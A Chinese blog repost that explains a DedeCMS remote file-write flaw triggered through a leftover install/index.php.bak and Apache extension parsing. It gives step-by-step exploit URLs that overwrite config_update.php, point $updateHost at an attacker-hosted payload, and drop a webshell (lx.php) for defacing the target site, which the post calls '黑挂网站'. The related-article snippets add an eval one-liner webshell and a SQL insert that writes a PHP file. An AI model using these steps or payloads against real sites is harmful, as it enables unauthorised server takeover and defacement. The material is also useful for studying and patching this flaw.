DeDecms远程写入漏洞webshell (dedecms漏洞)

最新推荐文章于 2025-03-09 21:07:25 发布
最新推荐文章于 2025-03-09 21:07:25 发布
阅读量2.8k 收藏
点赞数
文章标签: php shell python
原文链接:http://www.cnblogs.com/feixiablog/p/10399438.html
版权

解释下Apache解析文件的流程:


当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。

那么这样的话,像1.php.bak这样的文件名就会被当做php文件所解析。这也就是传说中的Apache解析漏洞。

 

利用条件:首先,是目标站安装完cms后并没有删除install文件夹,漏洞文件为\install\index.php.bak 。

目标站点的Apache存在文件解析漏洞。即index.php.bak文件会被当做PHP脚本解析,代码如下:

else if($step==11)
{
	require_once('../data/admin/config_update.php');
	$rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";

	$sql_content = file_get_contents($rmurl);
	$fp = fopen($install_demo_name,'w');
	if(fwrite($fp,$sql_content))
		echo '  <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
	else
		echo '  <font color="red">[×]</font> 远程获取失败';
	unset($sql_content);
	fclose($fp);
	exit();
}

原理:由于远程要包含文件的服务器地址是通过 $updateHost 控制的,那我们首先利用代码来改写../data/admin/config_update.php这个文件,使我们可以自定义 $updateHost的值,那样就可以引用任何我们想要引用的文件啦!

黑挂网站:

第一步:随便找一个网站 新建个http://xxx.xxx.xxx.xxx/dedecms/demodata.a.txt

http://xxx.xxx.xxx.xxx/dedecms/demodata.a.txt

第二步:检测远程更新是否有用,摧毁config_update.php的内容

http://目标站点/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php

第三步:设置$updateHost的值,注入执行脚本等

http://目标站点/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=lx.php&updateHost=http://存放demodata.a.txt脚本的域名/

第四步:利用webshell,挂黑目标站点

shell地址:http://目标站点//install/lx.php

 

  

 

转载于:https://www.cnblogs.com/feixiablog/p/10399438.html

aomiano55778
关注
织梦dedecms的框架的Webshell
wo41ge的博客
12-19 412
一、后台 后台登录 http://www.dedecms.com/dede 后台界面 二、Webshell方法 方法1:文件上传 蚁剑进行连接 成功 方法2:新建一句话文件 蚁剑连接 方法3:html修改 打开模板-默认模版管理-index.htm 文件包含 将FTP21端口改成:<?php @eval($_REQUEST["dayu"]); ?> ...
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现)
kid的博客
06-05 6218
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现) 前言 前面看一个视频提到这个漏洞的复现,自己觉得这种漏洞复现然后分析原因还是蛮有意思的,所以这里也来实现一下这个漏洞的复现,自己动手还是很重要的一个过程吧 过程 首先是搭建环境,phpstudy + dedecms5.7 sp1基本是一键安装 漏洞原因主要是在install的index.php文件中 foreach(Array('_...
dedecms织梦 标签远程文件写入漏洞
weixin_34261415的博客
03-21 233
测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 前题条件,必须准备好自己的dede数据库,然后插入数据:   insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp =@fopen("1.php", \''a\'');@fwrite($fp, \''\''...
如何加固织梦CMS,防webshell、防篡改、防劫持,提升DedeCMS防护能力,从零基础到精通,收藏这篇就够了!
最新发布
leah126的博客
03-09 679
系统立即就对PHP文件进行防篡改保护,同时不会影响管理员日常维护网站,没有副作用(非常有特色的地方,大部分防篡改软件都有副作用)。开启防篡改保护后,还需要对后台做下防护,防止黑客窃取后台权限,进行合法的篡改操作(如设置网站配置信息,植入恶意代码)。》,因为其内置织梦CMS防篡改规则,非常简单的操作就可以开启强大的防篡改功能(如下图一),同时没有副作用。》的“网站后台保护”模块可以实现,填写后台地址,设置授权密码以及允许访问的区域,就可以了(如下图三)。使用底层驱动技术防护,即通过防篡改软件进行防护。
提供远程webshell
diaoqin7781的博客
04-24 492
之前网站被黑挂了马 很恶心 本人能力有限, 漏洞太多, 补不过来,网站经常被 黑客进来玩过家家。 被逼无奈之下 还好我发开了一整套的监控维护脚本系统 只要你敢上传, 即上传即失效 唉,废话不多少,来看脚本 这B 竟然再我的 /tmp/ 目录下上了个 伪装的类似安全证书的东西。一般你不细看 ,还是真的难区分啊 一个PHP写的简单的...
织梦dedecms5.5爆最新漏洞,可得到webshell
weixin_33788244的博客
12-03 600
影响版本:Dedecms 5.5漏洞描述:漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。<*参考 by:Flyh4t*...
dedecms 5.7后台拿WEBSHELL
weixin_33991727的博客
03-31 373
由于系统自带的文件管理器插件没有过滤文件上传及编辑后保存的文件名, 导致直接写入webshell漏洞漏洞测试: 1、进入后台,默认的是dede www.xxxx.com/dede 左边导航栏目,选择模块>辅助插件>文件管理器 (系统默认安装的,如果没有请在插件管理器中自行安装)>然后选择新建文本(或者文件上传) 如上图:文件名称随便填,例如1...
dedecms远程文件包含漏洞
weixin_43778463的博客
11-06 1190
dedecms远程文件包含漏洞
DEDECMS v5.6漏洞复现
_Ralph的博客
01-16 8233
织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类cms系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 闲来无事,复现一下dedecms v5.6版
常见CMS漏洞(WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin)
2301_76631050的博客
08-04 2123
利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\。猜测web路径: E:\phpstudy_pro\WWW。不要用\,如里要用\\(转义)
dedeCMS V5_7 SP2后台代码执行漏洞复现
qq_39922242的博客
10-27 1155
漏洞描述: DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell 安装dedecms. 打开已知存在漏洞php页面 tpl.php 查看源码 1.定义了一个savetagfile的函数,判断参数”action”是否等于savetagfile,如果等于就进行下一步 2.csrf检验函数,需要加上token来绕过限制 3.正则表达式匹配,判断filename参数是否匹配正则表达式的条件,不匹配就不能进行修改操作。 4.$con
120.网络安全渗透测试—[CMS后台 getwebshell]—[织梦dedecms5.7后台 getwebshell]
qwsn
07-10 2988
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)进入后台:模块–>文件管理器---->上传文件---->shell.php,内容为 (2)访问:\shell.php(1)进入后台:模块–>文件管理器–>新建文件–>写入wshell.php,内容为 (2)访问:\wshell.php (3)访问:\shell0.php (1)进入后台:系统–>系统基本参数–>核心配置–>专题最大的节点数或FTP端口写入 (2)访问:data\config.cache.inc.php....
DeDeCMS漏洞
weixin_53198216的博客
08-03 296
4.在生成下选择更新主页HTML,将主页位置后缀改为php,首页模式选择生成静态,再点击更新主页HTML。2.选择模板下的默认模板管理,找到index.htm。7.打开蚁剑,输入网址和密码点击测试连接,显示成功。6.复制到地址栏访问,没有显示内容证明注入成功。3.对这个文件进行编辑写入一句话木马并保存。5.出现一个更新后的路径。
渗透测试-地基篇-Webshell-织梦dedecms框架(八)
qq_34801745的博客
11-25 1845
** 渗透测试-地基篇-Webshell-织梦dedecms框架(八) ** 作者:大余 时间:2020-11-25 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣
python如何执行代码漏洞_织梦dedecms最新远程代码执行利用脚本(python
weixin_39638304的博客
12-15 262
织梦CMS漏洞,就好比女人的大姨妈,每个月不来上一次,这就算是内分泌失调。代码是用python写的,小伙伴们自行调试吧!在前段时间,织梦爆出了一个远程文件包含漏洞。呃,感谢hoseph同学提供的代码吧。写的很不错!修复此漏洞方法,请见文章底部。#! /usr/bin/env python#coding=utf-8#Joseph(小续)import requestsimport sysimport ...
dedecms 躺着也中枪 爆重装漏洞
ITfinder
06-30 278
利用条件:web server: apache漏洞原因::apache 不认识bak 直接当php执行. http://webshell.cc/install/index.php.bak?insLockfile=1 这dedecms死的太冤枉了. apache的原因. 原文地址:http://www.webshell.cc/4379.html   不过这个问题并不会影响太大,因为当进行...
dedecms(四种webshell姿势)
2301_81525518的博客
09-17 844
步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell来到靶场进入后台登录来到这里上传一个一句话木马文件拿去蚁剑连接就ok了。
Dedecms织梦远程写文件漏洞
鸥鹭忘机
07-28 1189
基本信息 漏洞编号:SSV-89354 CVE-ID:CVE-2015-4553 漏洞类别:变量覆盖 实验版本:dedecms v5.7SP1(部分版本已修复) 利用条件:Apache,dedecms版本为v5.7SP且未修复,自备一台云主机 云主机ip:192.168.18.131 参考文章:http://blog.nsfocus.net/dedecms-write-file-vuln/ https://seclists.org/fulldisclosure/2015/Jun/47 2015年6月17日
dedecmsshell
08-24
DedeCMS是一款常见的内容管理系统,它也存在一些被黑客利用的漏洞来获取shell权限。其中,有一种常见的方法是通过在广告管理模块中的新建广告功能中插入恶意代码来实现。具体操作是在广告内容处写入恶意代码并提交,然后利用ad_add.php文件进行处理,从而获取shell权限。这是一种比较常见的方式,但需要注意的是,这种漏洞只会影响特定版本的DedeCMS,且需要具有管理员权限才能进行操作。 除了在广告管理模块中利用漏洞获取shell权限外,还有其他一些常见的方法,比如利用网站管理员的添加插件功能来上传包含恶意代码的插件文件,从而达到获取shell权限的目的。此外,还可以通过执行SQL语句写入webshell的方式,或者利用文件包含的漏洞进行攻击。总的来说,获取DedeCMSshell权限有多种方法,黑客们会根据具体情况选择最适合的方法进行攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Dedecms 5.7 SP2后台getshell](https://blog.youkuaiyun.com/he_and/article/details/80890664)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [apache的网站配置目录_网站后台getshell的方法总结](https://blog.youkuaiyun.com/weixin_39977776/article/details/110105614)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值